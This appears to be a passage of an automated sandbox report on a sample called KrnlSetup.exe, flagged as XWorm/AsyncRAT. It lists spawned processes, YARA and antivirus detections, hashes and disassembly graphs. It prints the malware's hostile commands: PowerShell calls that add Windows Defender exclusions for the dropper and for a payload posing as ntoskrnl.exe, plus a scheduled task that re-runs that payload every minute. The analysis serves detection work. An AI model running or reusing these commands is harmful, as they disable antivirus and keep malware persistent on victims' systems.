                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.0000000002516000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2614356137.00000000025AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:04:04:00
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KrnlSetup.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:2
                                                                              Start time:04:04:00
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:04:04:07
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KrnlSetup.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:5
                                                                              Start time:04:04:07
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:04:04:19
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\ntoskrnl.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:10
                                                                              Start time:04:04:19
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:04:04:34
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ntoskrnl.exe'
                                                                              Imagebase:0x7ff788560000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:12
                                                                              Start time:04:04:34
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:13
                                                                              Start time:04:04:55
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                                                              Imagebase:0x7ff76f990000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:14
                                                                              Start time:04:04:55
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:15
                                                                              Start time:04:04:57
                                                                              Start date:10/12/2024
                                                                              Path:C:\ProgramData\ntoskrnl.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\ProgramData\ntoskrnl.exe
                                                                              Imagebase:0xe0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ntoskrnl.exe, Author: ditekSHen
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 74%, ReversingLabs
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:16
                                                                              Start time:04:05:04
                                                                              Start date:10/12/2024
                                                                              Path:C:\ProgramData\ntoskrnl.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\ProgramData\ntoskrnl.exe"
                                                                              Imagebase:0xb0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:17
                                                                              Start time:04:05:12
                                                                              Start date:10/12/2024
                                                                              Path:C:\ProgramData\ntoskrnl.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\ProgramData\ntoskrnl.exe"
                                                                              Imagebase:0x3a0000
                                                                              File size:89'600 bytes
                                                                              MD5 hash:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:19
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\schtasks.exe" /delete /f /tn "ntoskrnl"
                                                                              Imagebase:0x7ff76f990000
                                                                              File size:235'008 bytes
                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:20
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:21
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF6F2.tmp.bat""
                                                                              Imagebase:0x7ff7a2650000
                                                                              File size:289'792 bytes
                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:22
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:23
                                                                              Start time:04:05:29
                                                                              Start date:10/12/2024
                                                                              Path:C:\Windows\System32\timeout.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:timeout 3
                                                                              Imagebase:0x7ff6ad610000
                                                                              File size:32'768 bytes
                                                                              MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:true

                                                                              Disassembly

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:23.9%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:21.4%
                                                                                Total number of Nodes:14
                                                                                Total number of Limit Nodes:1

                                                                                Executed Functions

                                                                                Function 00007FFD9B787B41 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 124COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 13 7ffd9b787b41-7ffd9b787bfd CheckRemoteDebuggerPresent 16 7ffd9b787bff 13->16 17 7ffd9b787c05-7ffd9b787c48 13->17 16->17
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID: CheckDebuggerPresentRemote
                                                                                • String ID: U
                                                                                • API String ID: 3662101638-3372436214
                                                                                • Opcode ID: 8766011165efd10bc69359b4e8dec4abed44827c3fe91720f9f06a3c327cce5c
                                                                                • Instruction ID: 3cc429e5a09922f9631c84d67f4762e5512b03779d9a9b5cdc343e71c320cc7c
                                                                                • Opcode Fuzzy Hash: 8766011165efd10bc69359b4e8dec4abed44827c3fe91720f9f06a3c327cce5c
                                                                                • Instruction Fuzzy Hash: FE3125319087588FCB18DF58C84ABE97BE0FF55311F0542AFD489D7192DB34A806CB91
                                                                                Function 00007FFD9B789369 Relevance: 2.6, Strings: 1, Instructions: 1391COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 49 7ffd9b789369-7ffd9b7893fd call 7ffd9b789010 call 7ffd9b780388 call 7ffd9b7881a8 60 7ffd9b7893ff-7ffd9b78942c call 7ffd9b780398 49->60 61 7ffd9b789431-7ffd9b789454 49->61 60->61 65 7ffd9b78945a-7ffd9b789467 61->65 66 7ffd9b78a50d-7ffd9b78a514 61->66 67 7ffd9b7897c8 65->67 68 7ffd9b78946d-7ffd9b7894ab 65->68 69 7ffd9b78a51e-7ffd9b78a525 66->69 72 7ffd9b7897cd-7ffd9b789801 67->72 75 7ffd9b78a4e8-7ffd9b78a4ee 68->75 76 7ffd9b7894b1-7ffd9b7894ce call 7ffd9b788468 68->76 70 7ffd9b78a536-7ffd9b78a53d 69->70 71 7ffd9b78a527-7ffd9b78a531 call 7ffd9b780378 69->71 71->70 77 7ffd9b789808-7ffd9b78984a 72->77 78 7ffd9b78a4f0-7ffd9b78a507 75->78 79 7ffd9b78a542 75->79 76->75 83 7ffd9b7894d4-7ffd9b78950e 76->83 93 7ffd9b78984c-7ffd9b78986d 77->93 94 7ffd9b78986f-7ffd9b7898a3 77->94 78->65 78->66 84 7ffd9b78a547-7ffd9b78a582 79->84 90 7ffd9b78956d-7ffd9b789595 83->90 91 7ffd9b789510-7ffd9b789563 83->91 98 7ffd9b789e89-7ffd9b789eb1 90->98 99 7ffd9b78959b-7ffd9b7895a8 90->99 91->90 97 7ffd9b7898aa-7ffd9b7898ec 93->97 94->97 117 7ffd9b7898ee-7ffd9b78990f 97->117 118 7ffd9b789911-7ffd9b789945 97->118 98->75 108 7ffd9b789eb7-7ffd9b789ec4 98->108 99->67 102 7ffd9b7895ae-7ffd9b7896a0 99->102 168 7ffd9b7896a6-7ffd9b7897a3 call 7ffd9b780358 102->168 169 7ffd9b789e60-7ffd9b789e66 102->169 108->67 109 7ffd9b789eca-7ffd9b789fc0 108->109 149 7ffd9b789fc6-7ffd9b78a029 109->149 150 7ffd9b78a63c-7ffd9b78a677 109->150 122 7ffd9b78994c-7ffd9b789a63 call 7ffd9b780358 117->122 118->122 187 7ffd9b789a65-7ffd9b789a86 122->187 188 7ffd9b789a88-7ffd9b789abc 122->188 159 7ffd9b78a67c-7ffd9b78a6b7 149->159 175 7ffd9b78a02f-7ffd9b78a092 149->175 150->159 167 7ffd9b78a6bc-7ffd9b78a6f0 159->167 173 7ffd9b78a6f7 167->173 168->72 218 7ffd9b7897a5-7ffd9b7897c6 168->218 169->79 171 7ffd9b789e6c-7ffd9b789e83 169->171 171->98 171->99 173->173 175->167 196 7ffd9b78a098-7ffd9b78a160 175->196 191 7ffd9b789ac3-7ffd9b789b5a 187->191 188->191 191->67 222 7ffd9b789b60-7ffd9b789d10 call 7ffd9b780358 191->222 196->75 218->77 222->79 247 7ffd9b789d16-7ffd9b789d18 222->247 248 7ffd9b78a587-7ffd9b78a5d4 247->248 249 7ffd9b789d1e-7ffd9b789d5c 247->249 260 7ffd9b78a5d6-7ffd9b78a5f7 248->260 261 7ffd9b78a5fc-7ffd9b78a637 248->261 249->84 258 7ffd9b789d62-7ffd9b789d93 249->258 263 7ffd9b789d95-7ffd9b789ded 258->263 260->261 261->150 271 7ffd9b789e3d-7ffd9b789e5a 263->271 272 7ffd9b789def-7ffd9b789e0b 263->272 271->169 272->263 274 7ffd9b789e0d-7ffd9b789e36 272->274 274->271
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: B
                                                                                • API String ID: 0-1255198513
                                                                                • Opcode ID: 93a397406e5cc29279a83a4b8bcfeb3488ea52bd85d18cffa4bbfa08ad72ae5e
                                                                                • Instruction ID: b9f8763a0d37420033fa93b0d5f50ed61a7a870f057aa6b22eba7b4325cab1ab
                                                                                • Opcode Fuzzy Hash: 93a397406e5cc29279a83a4b8bcfeb3488ea52bd85d18cffa4bbfa08ad72ae5e
                                                                                • Instruction Fuzzy Hash: 94A29374B18B098FE758EF6884A9BBDB7E2FF98305F504579E00DD3295DE34A8818B41
                                                                                Function 00007FFD9B791FDA Relevance: 2.4, Strings: 1, Instructions: 1150COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 292 7ffd9b791fda-7ffd9b792065 296 7ffd9b79206b-7ffd9b792095 292->296 297 7ffd9b792bfe-7ffd9b792c0c 292->297 300 7ffd9b7923e6-7ffd9b7923e9 296->300 301 7ffd9b79209b-7ffd9b7920b6 296->301 302 7ffd9b792bf8-7ffd9b792bfd 300->302 303 7ffd9b7923ef-7ffd9b7923f2 300->303 301->300 307 7ffd9b7920bc-7ffd9b792114 301->307 302->297 303->296 304 7ffd9b7923f8 303->304 304->297 311 7ffd9b79211a-7ffd9b79216a 307->311 312 7ffd9b7923fd-7ffd9b7924cf call 7ffd9b780d30 307->312 319 7ffd9b7924db-7ffd9b792522 call 7ffd9b780d30 311->319 320 7ffd9b792170-7ffd9b7921c0 311->320 370 7ffd9b7924d6 312->370 340 7ffd9b792336 319->340 341 7ffd9b792528-7ffd9b79252f 319->341 330 7ffd9b7921c6-7ffd9b792216 320->330 331 7ffd9b792684-7ffd9b7926c4 320->331 350 7ffd9b79274a-7ffd9b792756 330->350 351 7ffd9b79221c-7ffd9b79226c 330->351 331->340 356 7ffd9b7926ca-7ffd9b79272e 331->356 349 7ffd9b79233b-7ffd9b792341 340->349 344 7ffd9b792535-7ffd9b79255c 341->344 345 7ffd9b792531-7ffd9b792533 341->345 348 7ffd9b79255e-7ffd9b7925cf 344->348 345->348 348->340 420 7ffd9b7925d5-7ffd9b7925dc 348->420 362 7ffd9b792344-7ffd9b792347 349->362 350->340 358 7ffd9b79275c-7ffd9b79276c 350->358 379 7ffd9b79283d-7ffd9b79287d 351->379 380 7ffd9b792272-7ffd9b7922c2 351->380 404 7ffd9b79273d-7ffd9b792745 call 7ffd9b78d468 356->404 405 7ffd9b792730-7ffd9b792738 call 7ffd9b78d470 356->405 358->297 369 7ffd9b792772-7ffd9b7927b2 358->369 366 7ffd9b79234d-7ffd9b792a00 362->366 367 7ffd9b7923d2-7ffd9b7923d6 362->367 366->297 377 7ffd9b792a06-7ffd9b792a62 call 7ffd9b780d30 366->377 367->302 372 7ffd9b7923dc-7ffd9b7923e0 367->372 369->340 400 7ffd9b7927b8-7ffd9b7927d2 369->400 370->297 372->300 372->307 377->340 430 7ffd9b792a68-7ffd9b792a95 call 7ffd9b791c20 377->430 379->340 416 7ffd9b792883-7ffd9b79288a 379->416 407 7ffd9b792927-7ffd9b792967 380->407 408 7ffd9b7922c8-7ffd9b792318 380->408 400->340 418 7ffd9b7927d8-7ffd9b792838 call 7ffd9b791c20 400->418 404->297 405->297 407->340 451 7ffd9b79296d-7ffd9b7929f4 call 7ffd9b780d30 call 7ffd9b78e020 407->451 440 7ffd9b79231a-7ffd9b792326 408->440 441 7ffd9b792352-7ffd9b7923a2 408->441 421 7ffd9b79288c-7ffd9b79288f 416->421 422 7ffd9b792891-7ffd9b7928b9 416->422 418->297 426 7ffd9b7925de-7ffd9b7925e1 420->426 427 7ffd9b7925e3-7ffd9b79260b 420->427 428 7ffd9b7928bb-7ffd9b792922 call 7ffd9b78d470 421->428 422->428 434 7ffd9b79260d-7ffd9b79267f call 7ffd9b78e020 426->434 427->434 428->297 430->340 468 7ffd9b792a9b-7ffd9b792ab8 430->468 434->297 440->340 448 7ffd9b792328-7ffd9b79232f 440->448 441->367 472 7ffd9b7923a4-7ffd9b7923b0 441->472 448->349 454 7ffd9b792331-7ffd9b792334 448->454 451->297 454->362 468->340 478 7ffd9b792abe-7ffd9b792adb 468->478 472->340 476 7ffd9b7923b2-7ffd9b7923b9 472->476 480 7ffd9b7923bb-7ffd9b7923be 476->480 481 7ffd9b7923c0-7ffd9b7923c6 476->481 478->340 492 7ffd9b792ae1-7ffd9b792b43 call 7ffd9b78d468 478->492 484 7ffd9b7923c9-7ffd9b7923cc 480->484 481->484 484->367 489 7ffd9b792b48-7ffd9b792b4f 484->489 489->297 490 7ffd9b792b55-7ffd9b792bf6 call 7ffd9b780d30 call 7ffd9b78d468 489->490 490->297 492->297
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: f0e3c4f32fc2f06a9efdb1dd97a62b65254d1904be1cb8da43ec23362337baf9
                                                                                • Instruction ID: 7dadeb19edbb735c88b40df4f7362b76a98e4be4688b6f52fe9a747674b5dffe
                                                                                • Opcode Fuzzy Hash: f0e3c4f32fc2f06a9efdb1dd97a62b65254d1904be1cb8da43ec23362337baf9
                                                                                • Instruction Fuzzy Hash: CB72C424B1CB094FE75CFB78486A679B7D2FF98700F5546BDE40DC32E6DE28A8418642
                                                                                Function 00007FFD9B781709 Relevance: 2.1, Strings: 1, Instructions: 881COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 516 7ffd9b781709-7ffd9b781740 517 7ffd9b78204a 516->517 518 7ffd9b781746-7ffd9b781898 call 7ffd9b780668 * 9 call 7ffd9b780a58 516->518 520 7ffd9b78204f-7ffd9b782096 517->520 564 7ffd9b7818a2-7ffd9b7818ff call 7ffd9b7804c8 call 7ffd9b7804c0 call 7ffd9b780358 call 7ffd9b780368 518->564 565 7ffd9b78189a-7ffd9b7818a1 518->565 578 7ffd9b781901-7ffd9b781919 564->578 565->564 581 7ffd9b78192c-7ffd9b78193c 578->581 582 7ffd9b78191b-7ffd9b781925 578->582 585 7ffd9b781964-7ffd9b781984 581->585 586 7ffd9b78193e-7ffd9b781949 581->586 582->581 593 7ffd9b781986-7ffd9b781990 call 7ffd9b780378 585->593 594 7ffd9b781995-7ffd9b7819f9 call 7ffd9b781028 585->594 586->578 589 7ffd9b78194b-7ffd9b78195d call 7ffd9b780358 586->589 589->585 593->594 604 7ffd9b7819ff-7ffd9b781a94 594->604 605 7ffd9b781a99-7ffd9b781b27 594->605 625 7ffd9b781b2e-7ffd9b781c6c call 7ffd9b781370 call 7ffd9b7812f8 call 7ffd9b780388 call 7ffd9b780398 604->625 605->625 648 7ffd9b781c6e-7ffd9b781ca1 625->648 649 7ffd9b781cba-7ffd9b781ced 625->649 648->649 656 7ffd9b781ca3-7ffd9b781cb0 648->656 659 7ffd9b781d12-7ffd9b781d42 649->659 660 7ffd9b781cef-7ffd9b781d10 649->660 656->649 661 7ffd9b781cb2-7ffd9b781cb8 656->661 663 7ffd9b781d4a-7ffd9b781d81 659->663 660->663 661->649 669 7ffd9b781d83-7ffd9b781da4 663->669 670 7ffd9b781da6-7ffd9b781dd6 663->670 672 7ffd9b781dde-7ffd9b781ea4 call 7ffd9b7803a8 call 7ffd9b781200 call 7ffd9b7804b0 669->672 670->672 672->520 686 7ffd9b781eaa-7ffd9b781ef2 672->686 686->520 691 7ffd9b781ef8-7ffd9b781f5c call 7ffd9b7809f8 686->691 700 7ffd9b781f60-7ffd9b781f73 call 7ffd9b781028 691->700 704 7ffd9b781f7a-7ffd9b781fbe call 7ffd9b7804b8 700->704 705 7ffd9b781f75 call 7ffd9b781278 700->705 704->700 713 7ffd9b781fc0-7ffd9b78202a 704->713 705->704 721 7ffd9b782031-7ffd9b782049 713->721
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: U
                                                                                • API String ID: 0-3372436214
                                                                                • Opcode ID: 7da51b4d0a832a471125286e035b71f644fa8f66e3a48a2534c4aeb28b486401
                                                                                • Instruction ID: 39bdb60e31ebf5da82eba38e75973b8ed016bb521de06cd4308c3b5785b6e94e
                                                                                • Opcode Fuzzy Hash: 7da51b4d0a832a471125286e035b71f644fa8f66e3a48a2534c4aeb28b486401
                                                                                • Instruction Fuzzy Hash: EA52B474B19E094FE798EB6C84B5ABD77D2EF98301F4406B9E01EC32E6DD38A9418741
                                                                                Function 00007FFD9B793FB9 Relevance: 1.8, Strings: 1, Instructions: 514COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 723 7ffd9b793fb9-7ffd9b793fd5 724 7ffd9b793fd7 723->724 725 7ffd9b793fd8-7ffd9b79402a 723->725 724->725 726 7ffd9b79402c 725->726 727 7ffd9b794031-7ffd9b794048 725->727 726->727 728 7ffd9b79404a-7ffd9b79404f call 7ffd9b78eb38 727->728 729 7ffd9b794050-7ffd9b79407f 727->729 728->729 733 7ffd9b794085-7ffd9b7940a1 729->733 734 7ffd9b794638-7ffd9b794640 call 7ffd9b78eb38 729->734 736 7ffd9b7940a7-7ffd9b7940b5 733->736 737 7ffd9b794322-7ffd9b79439d 733->737 744 7ffd9b7946e5-7ffd9b7946ed 734->744 745 7ffd9b794645-7ffd9b794697 734->745 738 7ffd9b7940b7 736->738 739 7ffd9b7940bc-7ffd9b7940d3 736->739 754 7ffd9b794593-7ffd9b7945d2 737->754 755 7ffd9b7943a3-7ffd9b7943c0 737->755 738->739 741 7ffd9b7940d9-7ffd9b79416e call 7ffd9b792d48 739->741 742 7ffd9b7942d4-7ffd9b7942e3 739->742 741->742 747 7ffd9b7942e5 742->747 748 7ffd9b7942ea-7ffd9b79431d 742->748 758 7ffd9b7946a1-7ffd9b7946d2 745->758 747->748 761 7ffd9b794634-7ffd9b794636 748->761 762 7ffd9b7945d9-7ffd9b7945e4 754->762 763 7ffd9b7945d4 754->763 770 7ffd9b7943ea-7ffd9b7943f6 755->770 771 7ffd9b7943c2-7ffd9b7943e5 755->771 765 7ffd9b7946d9-7ffd9b7946e4 758->765 761->745 767 7ffd9b7945e6 762->767 768 7ffd9b7945eb-7ffd9b7945f2 762->768 763->762 765->744 767->768 773 7ffd9b7945f9-7ffd9b794600 768->773 774 7ffd9b7945f4 768->774 777 7ffd9b7943f8-7ffd9b794436 770->777 778 7ffd9b794443-7ffd9b79446d 770->778 787 7ffd9b794473-7ffd9b7944d3 771->787 780 7ffd9b794607-7ffd9b79460a 773->780 781 7ffd9b794602 773->781 774->773 777->778 778->787 782 7ffd9b79460c 780->782 783 7ffd9b794611-7ffd9b794632 780->783 781->780 782->783 795 7ffd9b794633 783->795 796 7ffd9b7944d9-7ffd9b7944ee 787->796 795->761 797 7ffd9b7944f5-7ffd9b79458e call 7ffd9b78b010 796->797 797->795
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2642990150.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ffd9b780000_KrnlSetup.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: {L_H
                                                                                • API String ID: 0-2715681820
                                                                                • Opcode ID: f16b226badfc56195a18ae1a65e2889d3a77169e4ffb4a79a734b87075dd68b1
                                                                                • Instruction ID: ccf5d3d3ffe793997895e25917d31e4b411cb56ca9044e1f846d5c24ca790993
